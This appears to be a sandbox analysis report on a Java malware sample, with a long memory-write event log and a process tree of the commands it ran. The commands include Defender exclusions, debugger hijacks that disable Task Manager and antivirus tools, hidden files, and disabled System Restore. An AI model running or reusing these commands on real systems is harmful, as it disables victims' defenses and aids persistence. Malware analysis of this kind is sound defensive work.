PID 1968 wrote to memory of 1656	1968	cmd.exe	201
PID 1968 wrote to memory of 1656	1968	cmd.exe	201
PID 1968 wrote to memory of 1656	1968	cmd.exe	201
PID 900 wrote to memory of 284	900	java.exe	202
PID 900 wrote to memory of 284	900	java.exe	202
PID 900 wrote to memory of 284	900	java.exe	202
PID 284 wrote to memory of 1880	284	cmd.exe	203
PID 284 wrote to memory of 1880	284	cmd.exe	203
PID 284 wrote to memory of 1880	284	cmd.exe	203
PID 284 wrote to memory of 2028	284	cmd.exe	204
PID 284 wrote to memory of 2028	284	cmd.exe	204
PID 284 wrote to memory of 2028	284	cmd.exe	204
PID 900 wrote to memory of 1524	900	java.exe	205
PID 900 wrote to memory of 1524	900	java.exe	205
PID 900 wrote to memory of 1524	900	java.exe	205
PID 1524 wrote to memory of 776	1524	cmd.exe	206
PID 1524 wrote to memory of 776	1524	cmd.exe	206
PID 1524 wrote to memory of 776	1524	cmd.exe	206
PID 1524 wrote to memory of 1936	1524	cmd.exe	207
PID 1524 wrote to memory of 1936	1524	cmd.exe	207
PID 1524 wrote to memory of 1936	1524	cmd.exe	207
PID 900 wrote to memory of 660	900	java.exe	208
PID 900 wrote to memory of 660	900	java.exe	208
PID 900 wrote to memory of 660	900	java.exe	208
PID 900 wrote to memory of 2032	900	java.exe	209
PID 900 wrote to memory of 2032	900	java.exe	209
PID 900 wrote to memory of 2032	900	java.exe	209
PID 660 wrote to memory of 1496	660	cmd.exe	211
PID 660 wrote to memory of 1496	660	cmd.exe	211
PID 660 wrote to memory of 1496	660	cmd.exe	211
PID 660 wrote to memory of 1576	660	cmd.exe	212
PID 660 wrote to memory of 1576	660	cmd.exe	212
PID 660 wrote to memory of 1576	660	cmd.exe	212
PID 900 wrote to memory of 1504	900	java.exe	213
PID 900 wrote to memory of 1504	900	java.exe	213
PID 900 wrote to memory of 1504	900	java.exe	213
PID 1504 wrote to memory of 1648	1504	cmd.exe	214
PID 1504 wrote to memory of 1648	1504	cmd.exe	214
PID 1504 wrote to memory of 1648	1504	cmd.exe	214
PID 1504 wrote to memory of 764	1504	cmd.exe	215
PID 1504 wrote to memory of 764	1504	cmd.exe	215
PID 1504 wrote to memory of 764	1504	cmd.exe	215
PID 900 wrote to memory of 1792	900	java.exe	216
PID 900 wrote to memory of 1792	900	java.exe	216
PID 900 wrote to memory of 1792	900	java.exe	216
PID 1792 wrote to memory of 1904	1792	cmd.exe	217
PID 1792 wrote to memory of 1904	1792	cmd.exe	217
PID 1792 wrote to memory of 1904	1792	cmd.exe	217
PID 1792 wrote to memory of 1528	1792	cmd.exe	218
PID 1792 wrote to memory of 1528	1792	cmd.exe	218
PID 1792 wrote to memory of 1528	1792	cmd.exe	218
PID 900 wrote to memory of 576	900	java.exe	219
PID 900 wrote to memory of 576	900	java.exe	219
PID 900 wrote to memory of 576	900	java.exe	219
PID 576 wrote to memory of 1532	576	cmd.exe	220
PID 576 wrote to memory of 1532	576	cmd.exe	220
PID 576 wrote to memory of 1532	576	cmd.exe	220
PID 576 wrote to memory of 1080	576	cmd.exe	221
PID 576 wrote to memory of 1080	576	cmd.exe	221
PID 576 wrote to memory of 1080	576	cmd.exe	221
PID 900 wrote to memory of 1084	900	java.exe	222
PID 900 wrote to memory of 1084	900	java.exe	222
PID 900 wrote to memory of 1084	900	java.exe	222
PID 1084 wrote to memory of 1368	1084	cmd.exe	223
PID 1084 wrote to memory of 1368	1084	cmd.exe	223
PID 1084 wrote to memory of 1368	1084	cmd.exe	223
PID 1084 wrote to memory of 1712	1084	cmd.exe	224
PID 1084 wrote to memory of 1712	1084	cmd.exe	224
PID 1084 wrote to memory of 1712	1084	cmd.exe	224
PID 900 wrote to memory of 1412	900	java.exe	225
PID 900 wrote to memory of 1412	900	java.exe	225
PID 900 wrote to memory of 1412	900	java.exe	225
PID 1412 wrote to memory of 1260	1412	cmd.exe	226
PID 1412 wrote to memory of 1260	1412	cmd.exe	226
PID 1412 wrote to memory of 1260	1412	cmd.exe	226
PID 1412 wrote to memory of 1852	1412	cmd.exe	227
PID 1412 wrote to memory of 1852	1412	cmd.exe	227
PID 1412 wrote to memory of 1852	1412	cmd.exe	227
PID 900 wrote to memory of 1680	900	java.exe	228
PID 900 wrote to memory of 1680	900	java.exe	228
PID 900 wrote to memory of 1680	900	java.exe	228
PID 1680 wrote to memory of 888	1680	cmd.exe	229
PID 1680 wrote to memory of 888	1680	cmd.exe	229
PID 1680 wrote to memory of 888	1680	cmd.exe	229
PID 1680 wrote to memory of 1644	1680	cmd.exe	230
PID 1680 wrote to memory of 1644	1680	cmd.exe	230
PID 1680 wrote to memory of 1644	1680	cmd.exe	230
PID 900 wrote to memory of 268	900	java.exe	231
PID 900 wrote to memory of 268	900	java.exe	231
PID 900 wrote to memory of 268	900	java.exe	231
PID 268 wrote to memory of 2024	268	cmd.exe	232
PID 268 wrote to memory of 2024	268	cmd.exe	232
PID 268 wrote to memory of 2024	268	cmd.exe	232
PID 900 wrote to memory of 760	900	java.exe	233
PID 900 wrote to memory of 760	900	java.exe	233
PID 900 wrote to memory of 760	900	java.exe	233
PID 268 wrote to memory of 300	268	cmd.exe	235
PID 268 wrote to memory of 300	268	cmd.exe	235
PID 268 wrote to memory of 300	268	cmd.exe	235
PID 900 wrote to memory of 1876	900	java.exe	236
PID 900 wrote to memory of 1876	900	java.exe	236
PID 900 wrote to memory of 1876	900	java.exe	236
PID 1876 wrote to memory of 1264	1876	cmd.exe	237
PID 1876 wrote to memory of 1264	1876	cmd.exe	237
PID 1876 wrote to memory of 1264	1876	cmd.exe	237
PID 1876 wrote to memory of 1480	1876	cmd.exe	238
PID 1876 wrote to memory of 1480	1876	cmd.exe	238
PID 1876 wrote to memory of 1480	1876	cmd.exe	238
PID 900 wrote to memory of 524	900	java.exe	239
PID 900 wrote to memory of 524	900	java.exe	239
PID 900 wrote to memory of 524	900	java.exe	239
PID 524 wrote to memory of 1848	524	cmd.exe	240
PID 524 wrote to memory of 1848	524	cmd.exe	240
PID 524 wrote to memory of 1848	524	cmd.exe	240
PID 524 wrote to memory of 776	524	cmd.exe	241
PID 524 wrote to memory of 776	524	cmd.exe	241
PID 524 wrote to memory of 776	524	cmd.exe	241
PID 900 wrote to memory of 1980	900	java.exe	242
PID 900 wrote to memory of 1980	900	java.exe	242
PID 900 wrote to memory of 1980	900	java.exe	242
PID 1980 wrote to memory of 1588	1980	cmd.exe	243
PID 1980 wrote to memory of 1588	1980	cmd.exe	243
PID 1980 wrote to memory of 1588	1980	cmd.exe	243
PID 1980 wrote to memory of 1496	1980	cmd.exe	244
PID 1980 wrote to memory of 1496	1980	cmd.exe	244
PID 1980 wrote to memory of 1496	1980	cmd.exe	244
PID 900 wrote to memory of 1964	900	java.exe	245
PID 900 wrote to memory of 1964	900	java.exe	245
PID 900 wrote to memory of 1964	900	java.exe	245
PID 1964 wrote to memory of 1988	1964	cmd.exe	246
PID 1964 wrote to memory of 1988	1964	cmd.exe	246
PID 1964 wrote to memory of 1988	1964	cmd.exe	246
PID 1964 wrote to memory of 1112	1964	cmd.exe	247
PID 1964 wrote to memory of 1112	1964	cmd.exe	247
PID 1964 wrote to memory of 1112	1964	cmd.exe	247
PID 900 wrote to memory of 1944	900	java.exe	248
PID 900 wrote to memory of 1944	900	java.exe	248
PID 900 wrote to memory of 1944	900	java.exe	248
PID 1944 wrote to memory of 1620	1944	cmd.exe	249
PID 1944 wrote to memory of 1620	1944	cmd.exe	249
PID 1944 wrote to memory of 1620	1944	cmd.exe	249
PID 1944 wrote to memory of 1832	1944	cmd.exe	250
PID 1944 wrote to memory of 1832	1944	cmd.exe	250
PID 1944 wrote to memory of 1832	1944	cmd.exe	250
PID 900 wrote to memory of 1476	900	java.exe	251
PID 900 wrote to memory of 1476	900	java.exe	251
PID 900 wrote to memory of 1476	900	java.exe	251
PID 1476 wrote to memory of 1904	1476	cmd.exe	252
PID 1476 wrote to memory of 1904	1476	cmd.exe	252
PID 1476 wrote to memory of 1904	1476	cmd.exe	252
PID 1476 wrote to memory of 1816	1476	cmd.exe	253
PID 1476 wrote to memory of 1816	1476	cmd.exe	253
PID 1476 wrote to memory of 1816	1476	cmd.exe	253
PID 900 wrote to memory of 1696	900	java.exe	254
PID 900 wrote to memory of 1696	900	java.exe	254
PID 900 wrote to memory of 1696	900	java.exe	254
PID 1696 wrote to memory of 1080	1696	cmd.exe	255
PID 1696 wrote to memory of 1080	1696	cmd.exe	255
PID 1696 wrote to memory of 1080	1696	cmd.exe	255
PID 900 wrote to memory of 1992	900	java.exe	256
PID 900 wrote to memory of 1992	900	java.exe	256
PID 900 wrote to memory of 1992	900	java.exe	256
PID 1696 wrote to memory of 796	1696	cmd.exe	257
PID 1696 wrote to memory of 796	1696	cmd.exe	257
PID 1696 wrote to memory of 796	1696	cmd.exe	257
PID 900 wrote to memory of 1952	900	java.exe	259
PID 900 wrote to memory of 1952	900	java.exe	259
PID 900 wrote to memory of 1952	900	java.exe	259
PID 1952 wrote to memory of 1536	1952	cmd.exe	260
PID 1952 wrote to memory of 1536	1952	cmd.exe	260
PID 1952 wrote to memory of 1536	1952	cmd.exe	260
PID 1952 wrote to memory of 1384	1952	cmd.exe	261
PID 1952 wrote to memory of 1384	1952	cmd.exe	261
PID 1952 wrote to memory of 1384	1952	cmd.exe	261
PID 900 wrote to memory of 1332	900	java.exe	262
PID 900 wrote to memory of 1332	900	java.exe	262
PID 900 wrote to memory of 1332	900	java.exe	262
PID 1332 wrote to memory of 300	1332	cmd.exe	263
PID 1332 wrote to memory of 300	1332	cmd.exe	263
PID 1332 wrote to memory of 300	1332	cmd.exe	263
PID 1332 wrote to memory of 1984	1332	cmd.exe	264
PID 1332 wrote to memory of 1984	1332	cmd.exe	264
PID 1332 wrote to memory of 1984	1332	cmd.exe	264
PID 900 wrote to memory of 1928	900	java.exe	265
PID 900 wrote to memory of 1928	900	java.exe	265
PID 900 wrote to memory of 1928	900	java.exe	265
PID 1928 wrote to memory of 1892	1928	cmd.exe	266
PID 1928 wrote to memory of 1892	1928	cmd.exe	266
PID 1928 wrote to memory of 1892	1928	cmd.exe	266
PID 1928 wrote to memory of 2016	1928	cmd.exe	267
PID 1928 wrote to memory of 2016	1928	cmd.exe	267
PID 1928 wrote to memory of 2016	1928	cmd.exe	267
PID 900 wrote to memory of 1264	900	java.exe	268
PID 900 wrote to memory of 1264	900	java.exe	268
PID 900 wrote to memory of 1264	900	java.exe	268
PID 1264 wrote to memory of 1940	1264	cmd.exe	269
PID 1264 wrote to memory of 1940	1264	cmd.exe	269
PID 1264 wrote to memory of 1940	1264	cmd.exe	269
PID 1264 wrote to memory of 1936	1264	cmd.exe	270
PID 1264 wrote to memory of 1936	1264	cmd.exe	270
PID 1264 wrote to memory of 1936	1264	cmd.exe	270
PID 900 wrote to memory of 776	900	java.exe	271
PID 900 wrote to memory of 776	900	java.exe	271
PID 900 wrote to memory of 776	900	java.exe	271
PID 776 wrote to memory of 1920	776	cmd.exe	272
PID 776 wrote to memory of 1920	776	cmd.exe	272
PID 776 wrote to memory of 1920	776	cmd.exe	272
PID 776 wrote to memory of 332	776	cmd.exe	273
PID 776 wrote to memory of 332	776	cmd.exe	273
PID 776 wrote to memory of 332	776	cmd.exe	273
PID 900 wrote to memory of 1604	900	java.exe	274
PID 900 wrote to memory of 1604	900	java.exe	274
PID 900 wrote to memory of 1604	900	java.exe	274
PID 1604 wrote to memory of 1988	1604	cmd.exe	275
PID 1604 wrote to memory of 1988	1604	cmd.exe	275
PID 1604 wrote to memory of 1988	1604	cmd.exe	275
PID 1604 wrote to memory of 1052	1604	cmd.exe	276
PID 1604 wrote to memory of 1052	1604	cmd.exe	276
PID 1604 wrote to memory of 1052	1604	cmd.exe	276
PID 900 wrote to memory of 1168	900	java.exe	277
PID 900 wrote to memory of 1168	900	java.exe	277
PID 900 wrote to memory of 1168	900	java.exe	277
PID 1168 wrote to memory of 1832	1168	cmd.exe	278
PID 1168 wrote to memory of 1832	1168	cmd.exe	278
PID 1168 wrote to memory of 1832	1168	cmd.exe	278
PID 1168 wrote to memory of 528	1168	cmd.exe	279
PID 1168 wrote to memory of 528	1168	cmd.exe	279
PID 1168 wrote to memory of 528	1168	cmd.exe	279
PID 900 wrote to memory of 1800	900	java.exe	280
PID 900 wrote to memory of 1800	900	java.exe	280
PID 900 wrote to memory of 1800	900	java.exe	280
PID 1800 wrote to memory of 1804	1800	cmd.exe	281
PID 1800 wrote to memory of 1804	1800	cmd.exe	281
PID 1800 wrote to memory of 1804	1800	cmd.exe	281
PID 1800 wrote to memory of 1560	1800	cmd.exe	282
PID 1800 wrote to memory of 1560	1800	cmd.exe	282
PID 1800 wrote to memory of 1560	1800	cmd.exe	282
PID 900 wrote to memory of 1968	900	java.exe	283
PID 900 wrote to memory of 1968	900	java.exe	283
PID 900 wrote to memory of 1968	900	java.exe	283
PID 1968 wrote to memory of 2012	1968	cmd.exe	284
PID 1968 wrote to memory of 2012	1968	cmd.exe	284
PID 1968 wrote to memory of 2012	1968	cmd.exe	284
PID 1968 wrote to memory of 1792	1968	cmd.exe	285
PID 1968 wrote to memory of 1792	1968	cmd.exe	285
PID 1968 wrote to memory of 1792	1968	cmd.exe	285
PID 900 wrote to memory of 568	900	java.exe	286
PID 900 wrote to memory of 568	900	java.exe	286
PID 900 wrote to memory of 568	900	java.exe	286
PID 568 wrote to memory of 576	568	cmd.exe	287
PID 568 wrote to memory of 576	568	cmd.exe	287
PID 568 wrote to memory of 576	568	cmd.exe	287
PID 568 wrote to memory of 1976	568	cmd.exe	288
PID 568 wrote to memory of 1976	568	cmd.exe	288
PID 568 wrote to memory of 1976	568	cmd.exe	288
PID 900 wrote to memory of 1680	900	java.exe	289
PID 900 wrote to memory of 1680	900	java.exe	289
PID 900 wrote to memory of 1680	900	java.exe	289
PID 1680 wrote to memory of 1824	1680	cmd.exe	290
PID 1680 wrote to memory of 1824	1680	cmd.exe	290
PID 1680 wrote to memory of 1824	1680	cmd.exe	290
PID 1680 wrote to memory of 1876	1680	cmd.exe	291
PID 1680 wrote to memory of 1876	1680	cmd.exe	291
PID 1680 wrote to memory of 1876	1680	cmd.exe	291
PID 900 wrote to memory of 1368	900	java.exe	292
PID 900 wrote to memory of 1368	900	java.exe	292
PID 900 wrote to memory of 1368	900	java.exe	292
PID 1368 wrote to memory of 2028	1368	cmd.exe	293
PID 1368 wrote to memory of 2028	1368	cmd.exe	293
PID 1368 wrote to memory of 2028	1368	cmd.exe	293
PID 1368 wrote to memory of 268	1368	cmd.exe	294
PID 1368 wrote to memory of 268	1368	cmd.exe	294
PID 1368 wrote to memory of 268	1368	cmd.exe	294
PID 900 wrote to memory of 1784	900	java.exe	295
PID 900 wrote to memory of 1784	900	java.exe	295
PID 900 wrote to memory of 1784	900	java.exe	295
PID 1784 wrote to memory of 1796	1784	cmd.exe	296
PID 1784 wrote to memory of 1796	1784	cmd.exe	296
PID 1784 wrote to memory of 1796	1784	cmd.exe	296
PID 1784 wrote to memory of 796	1784	cmd.exe	297
PID 1784 wrote to memory of 796	1784	cmd.exe	297
PID 1784 wrote to memory of 796	1784	cmd.exe	297
PID 900 wrote to memory of 888	900	java.exe	298
PID 900 wrote to memory of 888	900	java.exe	298
PID 900 wrote to memory of 888	900	java.exe	298
PID 888 wrote to memory of 1844	888	cmd.exe	299
PID 888 wrote to memory of 1844	888	cmd.exe	299
PID 888 wrote to memory of 1844	888	cmd.exe	299
PID 888 wrote to memory of 2024	888	cmd.exe	300
PID 888 wrote to memory of 2024	888	cmd.exe	300
PID 888 wrote to memory of 2024	888	cmd.exe	300
PID 900 wrote to memory of 608	900	java.exe	301
PID 900 wrote to memory of 608	900	java.exe	301
PID 900 wrote to memory of 608	900	java.exe	301
PID 608 wrote to memory of 1032	608	cmd.exe	302
PID 608 wrote to memory of 1032	608	cmd.exe	302
PID 608 wrote to memory of 1032	608	cmd.exe	302
PID 608 wrote to memory of 1628	608	cmd.exe	303
PID 608 wrote to memory of 1628	608	cmd.exe	303
PID 608 wrote to memory of 1628	608	cmd.exe	303
PID 900 wrote to memory of 1692	900	java.exe	305
PID 900 wrote to memory of 1380	900	java.exe	304
PID 900 wrote to memory of 1692	900	java.exe	305
PID 900 wrote to memory of 1380	900	java.exe	304
PID 900 wrote to memory of 1692	900	java.exe	305
PID 900 wrote to memory of 1380	900	java.exe	304
PID 1692 wrote to memory of 1656	1692	cmd.exe	307
PID 1692 wrote to memory of 1656	1692	cmd.exe	307
PID 1692 wrote to memory of 1656	1692	cmd.exe	307
PID 1692 wrote to memory of 1100	1692	cmd.exe	308
PID 1692 wrote to memory of 1100	1692	cmd.exe	308
PID 1692 wrote to memory of 1100	1692	cmd.exe	308
PID 900 wrote to memory of 1924	900	java.exe	309
PID 900 wrote to memory of 1924	900	java.exe	309
PID 900 wrote to memory of 1924	900	java.exe	309
PID 1924 wrote to memory of 1496	1924	cmd.exe	310
PID 1924 wrote to memory of 1496	1924	cmd.exe	310
PID 1924 wrote to memory of 1496	1924	cmd.exe	310
PID 1924 wrote to memory of 1112	1924	cmd.exe	311
PID 1924 wrote to memory of 1112	1924	cmd.exe	311
PID 1924 wrote to memory of 1112	1924	cmd.exe	311
PID 900 wrote to memory of 1988	900	java.exe	312
PID 900 wrote to memory of 1988	900	java.exe	312
PID 900 wrote to memory of 1988	900	java.exe	312
PID 1988 wrote to memory of 1528	1988	cmd.exe	313
PID 1988 wrote to memory of 1528	1988	cmd.exe	313
PID 1988 wrote to memory of 1528	1988	cmd.exe	313
PID 1988 wrote to memory of 1832	1988	cmd.exe	314
PID 1988 wrote to memory of 1832	1988	cmd.exe	314
PID 1988 wrote to memory of 1832	1988	cmd.exe	314
PID 900 wrote to memory of 1056	900	java.exe	315
PID 900 wrote to memory of 1056	900	java.exe	315
PID 900 wrote to memory of 1056	900	java.exe	315
PID 1056 wrote to memory of 1064	1056	cmd.exe	316
PID 1056 wrote to memory of 1064	1056	cmd.exe	316
PID 1056 wrote to memory of 1064	1056	cmd.exe	316
PID 1056 wrote to memory of 1560	1056	cmd.exe	317
PID 1056 wrote to memory of 1560	1056	cmd.exe	317
PID 1056 wrote to memory of 1560	1056	cmd.exe	317
PID 900 wrote to memory of 1524	900	java.exe	318
PID 900 wrote to memory of 1524	900	java.exe	318
PID 900 wrote to memory of 1524	900	java.exe	318
PID 1524 wrote to memory of 1932	1524	cmd.exe	319
PID 1524 wrote to memory of 1932	1524	cmd.exe	319
PID 1524 wrote to memory of 1932	1524	cmd.exe	319
PID 1524 wrote to memory of 1084	1524	cmd.exe	320
PID 1524 wrote to memory of 1084	1524	cmd.exe	320
PID 1524 wrote to memory of 1084	1524	cmd.exe	320
PID 900 wrote to memory of 576	900	java.exe	321
PID 900 wrote to memory of 576	900	java.exe	321
PID 900 wrote to memory of 576	900	java.exe	321
PID 576 wrote to memory of 1980	576	cmd.exe	322
PID 576 wrote to memory of 1980	576	cmd.exe	322
PID 576 wrote to memory of 1980	576	cmd.exe	322
PID 576 wrote to memory of 1944	576	cmd.exe	323
PID 576 wrote to memory of 1944	576	cmd.exe	323
PID 576 wrote to memory of 1944	576	cmd.exe	323
PID 900 wrote to memory of 1876	900	java.exe	324
PID 900 wrote to memory of 1876	900	java.exe	324
PID 900 wrote to memory of 1876	900	java.exe	324
PID 1876 wrote to memory of 524	1876	cmd.exe	325
PID 1876 wrote to memory of 524	1876	cmd.exe	325
PID 1876 wrote to memory of 524	1876	cmd.exe	325
PID 1876 wrote to memory of 1296	1876	cmd.exe	326
PID 1876 wrote to memory of 1296	1876	cmd.exe	326
PID 1876 wrote to memory of 1296	1876	cmd.exe	326
PID 900 wrote to memory of 1712	900	java.exe	327
PID 900 wrote to memory of 1712	900	java.exe	327
PID 900 wrote to memory of 1712	900	java.exe	327
PID 1712 wrote to memory of 1796	1712	cmd.exe	328
PID 1712 wrote to memory of 1796	1712	cmd.exe	328
PID 1712 wrote to memory of 1796	1712	cmd.exe	328
PID 1712 wrote to memory of 1536	1712	cmd.exe	329
PID 1712 wrote to memory of 1536	1712	cmd.exe	329
PID 1712 wrote to memory of 1536	1712	cmd.exe	329
PID 900 wrote to memory of 1844	900	java.exe	330
PID 900 wrote to memory of 1844	900	java.exe	330
PID 900 wrote to memory of 1844	900	java.exe	330
PID 900 wrote to memory of 1880	900	java.exe	332
PID 900 wrote to memory of 1880	900	java.exe	332
PID 900 wrote to memory of 1880	900	java.exe	332
PID 900 wrote to memory of 2032	900	java.exe	334
PID 900 wrote to memory of 2032	900	java.exe	334
PID 900 wrote to memory of 2032	900	java.exe	334
PID 900 wrote to memory of 1904	900	java.exe	336
PID 900 wrote to memory of 1904	900	java.exe	336
PID 900 wrote to memory of 1904	900	java.exe	336
PID 900 wrote to memory of 1560	900	java.exe	338
PID 900 wrote to memory of 1560	900	java.exe	338
PID 900 wrote to memory of 1560	900	java.exe	338
PID 900 wrote to memory of 1980	900	java.exe	340
PID 900 wrote to memory of 1980	900	java.exe	340
PID 900 wrote to memory of 1980	900	java.exe	340
PID 900 wrote to memory of 1384	900	java.exe	342
PID 900 wrote to memory of 1384	900	java.exe	342
PID 900 wrote to memory of 1384	900	java.exe	342

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1836	attrib.exe
1852	attrib.exe
1260	attrib.exe
1804	attrib.exe
1796	attrib.exe
1784	attrib.exe
1764	attrib.exe
1876	attrib.exe

C:\Windows\system32\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\STATEMENT.jar
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:900
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:796
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:612
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1036
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1100
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1536
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:1836
- C:\Windows\system32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:1852
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\hmJMe\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1260
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\hmJMe\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1804
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\hmJMe
  2⤵
  - Views/modifies file attributes
  PID:1796
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\hmJMe
  2⤵
  - Views/modifies file attributes
  PID:1784
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\hmJMe
  2⤵
  - Views/modifies file attributes
  PID:1764
- C:\Windows\system32\attrib.exe
  attrib +h +s +r C:\Users\Admin\hmJMe\Lwqbj.class
  2⤵
  - Views/modifies file attributes
  PID:1876
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1560
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\hmJMe','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\hmJMe\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1892
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1940
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1904
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:1928
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1944
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:1032
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2040
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:1504
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:592
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:1168
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1052
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1532
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1488
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1704
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1788
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1692
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  2⤵
  PID:1896
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1952
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:544
- C:\Windows\System32\reg.exe
